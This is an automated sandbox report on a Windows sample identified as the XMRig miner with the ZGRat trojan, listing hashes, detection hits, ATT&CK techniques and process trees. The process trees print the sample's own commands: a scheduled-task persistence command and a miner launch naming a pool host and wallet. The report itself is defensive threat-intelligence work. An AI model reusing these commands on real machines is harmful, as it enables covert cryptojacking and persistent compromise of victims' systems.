xmrig | 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

Analysis

max time kernel
196s
max time network
188s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-02-2024 04:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/2436-0-0x0000000000AD0000-0x0000000001070000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000b000000015610-15.dat	family_zgrat_v1
behavioral1/files/0x000b000000015610-18.dat	family_zgrat_v1
behavioral1/files/0x000b000000015610-17.dat	family_zgrat_v1
behavioral1/memory/2692-19-0x0000000001000000-0x00000000015A0000-memory.dmp	family_zgrat_v1
behavioral1/memory/1160-41-0x0000000001210000-0x00000000017B0000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/memory/2640-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2640-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2796-58-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 6 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2436-0-0x0000000000AD0000-0x0000000001070000-memory.dmp	net_reactor
behavioral1/files/0x000b000000015610-15.dat	net_reactor
behavioral1/files/0x000b000000015610-18.dat	net_reactor
behavioral1/files/0x000b000000015610-17.dat	net_reactor
behavioral1/memory/2692-19-0x0000000001000000-0x00000000015A0000-memory.dmp	net_reactor
behavioral1/memory/1160-41-0x0000000001210000-0x00000000017B0000-memory.dmp	net_reactor

Executes dropped EXE 2 IoCs

pid	Process
2692	.exe
1160	.exe

Loads dropped DLL 1 IoCs

pid	Process
2752	cmd.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2640-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2640-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2796-55-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2796-58-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2692 set thread context of 2640	2692	.exe	38
PID 1160 set thread context of 2796	1160	.exe	45

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2720	schtasks.exe
932	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2268	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2692	.exe
1160	.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2436	8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
Token: SeDebugPrivilege	2692	.exe
Token: SeLockMemoryPrivilege	2640	vbc.exe
Token: SeLockMemoryPrivilege	2640	vbc.exe
Token: SeDebugPrivilege	1160	.exe
Token: SeLockMemoryPrivilege	2796	vbc.exe
Token: SeLockMemoryPrivilege	2796	vbc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2640	vbc.exe
2796	vbc.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2436 wrote to memory of 2752	2436	8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe	28
PID 2436 wrote to memory of 2752	2436	8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe	28
PID 2436 wrote to memory of 2752	2436	8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe	28
PID 2752 wrote to memory of 2268	2752	cmd.exe	30
PID 2752 wrote to memory of 2268	2752	cmd.exe	30
PID 2752 wrote to memory of 2268	2752	cmd.exe	30
PID 2752 wrote to memory of 2692	2752	cmd.exe	31
PID 2752 wrote to memory of 2692	2752	cmd.exe	31
PID 2752 wrote to memory of 2692	2752	cmd.exe	31
PID 2692 wrote to memory of 2708	2692	.exe	32
PID 2692 wrote to memory of 2708	2692	.exe	32
PID 2692 wrote to memory of 2708	2692	.exe	32
PID 2708 wrote to memory of 2720	2708	cmd.exe	34
PID 2708 wrote to memory of 2720	2708	cmd.exe	34
PID 2708 wrote to memory of 2720	2708	cmd.exe	34
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 2692 wrote to memory of 2640	2692	.exe	38
PID 1472 wrote to memory of 1160	1472	taskeng.exe	40
PID 1472 wrote to memory of 1160	1472	taskeng.exe	40
PID 1472 wrote to memory of 1160	1472	taskeng.exe	40
PID 1160 wrote to memory of 1732	1160	.exe	41
PID 1160 wrote to memory of 1732	1160	.exe	41
PID 1160 wrote to memory of 1732	1160	.exe	41
PID 1732 wrote to memory of 932	1732	cmd.exe	43
PID 1732 wrote to memory of 932	1732	cmd.exe	43
PID 1732 wrote to memory of 932	1732	cmd.exe	43
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45
PID 1160 wrote to memory of 2796	1160	.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
"C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9859.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2268
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2720
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2640

C:\Windows\system32\taskeng.exe
taskeng.exe {3EEBB892-729D-4F80-82DD-C370AB534160} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1472
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Creates scheduled task(s)
      PID:932
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
4.2MB

MD5
3d19738e1695ceea9223a35ce0f1a32c

SHA1
a3474d7683860e8aaac1c554b51be8d3bac1a55c

SHA256
05e670c2da8a08e24c45165522831fd3f5a436ccf42fdb86443484c844348095

SHA512
c8d4f07de4f95b4701b69515ef06b37c6e285d04815e816b22ac7f7b7743c7fc1cab9c8cba3e1fa4dcf5dd491f1d747c13227d0b6a280b35e50fe094712e028d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9859.tmp.bat

Filesize
168B

MD5
e47bb2ef328ffce607be365ca2baa179

SHA1
76cb816072eb16c26993546ec071c7b69e2c5e8d

SHA256
95e6a546667ea37e6495a2265aaea9416dcb09d3b966453003c0db0266365057

SHA512
b35faa731c196d5a719d079eb8c4b7d736b638fd4a4ae9fde5ceedca63fb9e5dd6d6bbfe58f042c61e8676e58b8cc2dd4cecfe4894f5be4fd042a586b671912a

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
2.8MB

MD5
d45d136de2cb1fd4b7a5ec3f7267f058

SHA1
60aca26c588a28a6c0389631d36632c2d6fca7fd

SHA256
5eb79aa2bd824b8f844869e6b5c5ad08caf505e3b625249dc9f98b2b77e09885

SHA512
89151fcf302d6c3a4b309375a7fceea96aebf06b715eab540548d0807dfef02edf8f948dea9c8c74d34d81525613e8384b40536797b1efb72636d1a806bdb6dc

Download Submit
memory/1160-54-0x000007FEF5560000-0x000007FEF5F4C000-memory.dmp

Filesize
9.9MB

Download
memory/1160-45-0x000000001C1F0000-0x000000001C270000-memory.dmp

Filesize
512KB

Download
memory/1160-44-0x000007FEF5560000-0x000007FEF5F4C000-memory.dmp

Filesize
9.9MB

Download
memory/1160-43-0x0000000000650000-0x0000000000651000-memory.dmp

Filesize
4KB

Download
memory/1160-42-0x000000001C1F0000-0x000000001C270000-memory.dmp

Filesize
512KB

Download
memory/1160-40-0x000007FEF5560000-0x000007FEF5F4C000-memory.dmp

Filesize
9.9MB

Download
memory/1160-41-0x0000000001210000-0x00000000017B0000-memory.dmp

Filesize
5.6MB

Download
memory/2436-14-0x000007FEF5560000-0x000007FEF5F4C000-memory.dmp

Filesize
9.9MB

Download
memory/2436-0-0x0000000000AD0000-0x0000000001070000-memory.dmp

Filesize
5.6MB

Download
memory/2436-2-0x000000001C370000-0x000000001C3F0000-memory.dmp

Filesize
512KB

Download
memory/2436-1-0x000007FEF5560000-0x000007FEF5F4C000-memory.dmp

Filesize
9.9MB

Download
memory/2436-3-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/2640-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-28-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/2640-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-33-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2640-36-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2640-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2692-32-0x000007FEF4B70000-0x000007FEF555C000-memory.dmp

Filesize
9.9MB

Download
memory/2692-24-0x000000001C370000-0x000000001C3F0000-memory.dmp

Filesize
512KB

Download
memory/2692-23-0x000007FEF4B70000-0x000007FEF555C000-memory.dmp

Filesize
9.9MB

Download
memory/2692-22-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2692-21-0x000000001C370000-0x000000001C3F0000-memory.dmp

Filesize
512KB

Download
memory/2692-19-0x0000000001000000-0x00000000015A0000-memory.dmp

Filesize
5.6MB

Download
memory/2692-20-0x000007FEF4B70000-0x000007FEF555C000-memory.dmp

Filesize
9.9MB

Download
memory/2796-49-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/2796-55-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2796-58-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download